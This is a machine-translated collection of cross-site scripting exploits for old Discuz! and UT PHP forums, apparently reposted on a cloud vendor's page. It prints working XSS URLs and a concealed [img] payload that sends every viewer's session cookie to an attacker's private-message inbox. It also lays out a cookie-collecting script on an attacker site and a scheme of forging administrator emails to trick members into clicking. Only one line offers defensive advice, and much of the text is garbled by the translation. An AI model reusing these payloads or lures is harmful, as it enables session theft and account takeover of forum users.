Famous PHP open-source forum: discuz! Cross-Site Daquan

Source: Internet
Author: User

In discuz! The Post, reply, PM, and other subject are not filtered, so you can also add Code .

For example

Http: // xxx/post. php? Action = newthread & FID = 2... percentage % 3E % 3cb % 22

The result is that your cookie is first popped up.

Method of exploits: place the above Code in IMG.

Applicable version: discuz! 2. x

Discuz! 3. x

Discuz! 2.0 try to cheat in obtaining cookies

A security vulnerability exists in the pm function of the xxxfan forum, which is described as follows:

The following is a private link from xxxfan to a member (assuming the member name is xxxfan)

Http: // xxx/PM. php? Action = Send & username = xxxfan

Because ForumProgramThe member name is not filtered, but directly displayed in the column (to :), so you can add script code after the name. For example

Http: // xxx/PM. php? Action = Send & username = xxxfan ";> <SCRIPT> alert (document .. cookie) </SCRIPT> <B % 20"

After clicking the above link, the first pop-up is your own cookie content.

Of course, we can first construct a program on our own site to collect cookies, similar

Getcookie. php? Cookie =

But how can we trick members into clicking? It is too easy to be recognized if it is simply put on a forum. Therefore, you can use another feature of the discuz Forum program, "post to friends.

Because discuz does not filter, identify, or template the entered emial address, it can counterfeit anyone to send emails to others, which is highly secure. Using this function, we can forge an exploitfan administrator to send a letter to a member, entice the Member to click on the URL we have prepared, and if tempted, we will look at our own means, for example, you can say "the Forum is testing new features. Please click the above address. We will record your clicks in the background and add points to you at the right time to reward you.

Because the link address is xxxfan, and the sender and email address are both official addresses of xxxfan, the reliability is very high and no handle is left. Of course, for higher security, you can encrypt the content in <SCRIPT> to further increase concealment.

You can try cookie spoofing or brute-force cracking to obtain the MD5 password.

This method is applicable to most forums where discuz2.0 is used. For discuz3.0 usage methods, please participate in the discuz I posted earlier! Whisper Vulnerability

[Bug] discuz! Voting bug

Voting is available

Misc. php? Action = votepoll & FID = 2 & tid = 16980 & pollanswers [] = N

(N is the option, starting from 0)

Directly vote through URL

But what if n> the largest option ~

The submission is successful, but an option with the title blank is added.

See:

Http://discuz.net/viewthread.php? Tid = 20020 & SID = dympec

(The last blank is the one I just added)

Versions of the vulnerability:

Discuz! 3. x

Discuz! 2. x (possible, not tested)

Discuz! Code Vulnerability

This was followed by the Vulnerability Detected yesterday, the first discoverer (pk0909 ).

Here is a simple test code.

Http://www.xxxx.net/phpbbs/post.php? Action... % 3C % 2 fscript % 3E

The above code shows your cookie

The following is the test code in a famous Forum. No matter who looks at the webpage, the cookie will be sent to the specified member text message box, which is concealed. If someone references your post, haha ~ It will all run out here.

[Img] http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject (% 22msxml2. XMLHTTP % 22); Req. Open (% 22 Post % 22, % 22 http://www.XXXX.com/forum/pm.php? Action = Send % 22, false); var % 20 forms = % 22 pmsubmit = submit % 22. tolowercase () % 2B % 22% 26 msgto = XXXXX % 26 subject = cookie % 26 saveoutbox = 0% 26 message = % 22% 2 bescape (document .. cookie); req. setRequestHeader (% 22content-length % 22, forms. length) % 3breq. setRequestHeader (% 22content-type % 22, % 22 Application/X-WWW-form-urlencoded % 22); req. send (Forms); % 3C/script % 3E % 3cb % 22 [/img]

Discuz found! Ut cross-Origin Site Scripting vulnerability-a short message about cross-Origin Site Scripting vulnerability, which is already very common.

For specific messages, see:

Http://www.cert.org/advisories/CA-2000-02.html

The following is a private description of discuz and UT Forum programs.

Adaptive vulnerability version:

Discuz1.x

Discuz! 2.0 (version 0609,0820)

Discuz! 3. x

Ut 1.0

Vulnerability description:

Discuz! Is it similar to a http://www.XXXX.net/phpbbs/pm.php to send a whisper to a specified member? Action = Send & username = Name statement, but the name is not filtered and directly displayed on the page where the short message is sent. This opens the door to Cookie Stealing or more serious damage.

Discuz! 3. Has X been changed to http://XXX.net/pm.php? Action = Send & uid = XXXX similar statement to avoid this vulnerability, but it is not filtered when you select the SMS folder. The above vulnerability also exists.

Example

Http://www.XXXX.net/phpbbs/pm.php? Action = s... D & username = Name % 22% 3E % 3 cscript % 3 ealert (document .. cookie) % 3C/script % 3E % 3cb % 22 [/url]

The preceding example shows your cookie. (For discuz! 1. x discuz! 2. x)

Http://XXX.net/pm.php? Folder = inbox % 22% 3E % 3... percentage % 3E % 3cb % 22

Display your own cookies. (For discuz! 3. X)

Although ut is filtered on the topic, that is to say, % 27 is converted to ', but its recipients are not filtered, so there are similar vulnerabilities. Example omitted. (The code is found to be different on different ut forums, but there are similar vulnerabilities in general)

Hazard level: Medium or weak

Preventive measures:

Pay attention to the actual content when you click the hyperlink. For more security patches, please pay close attention to the official forum.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.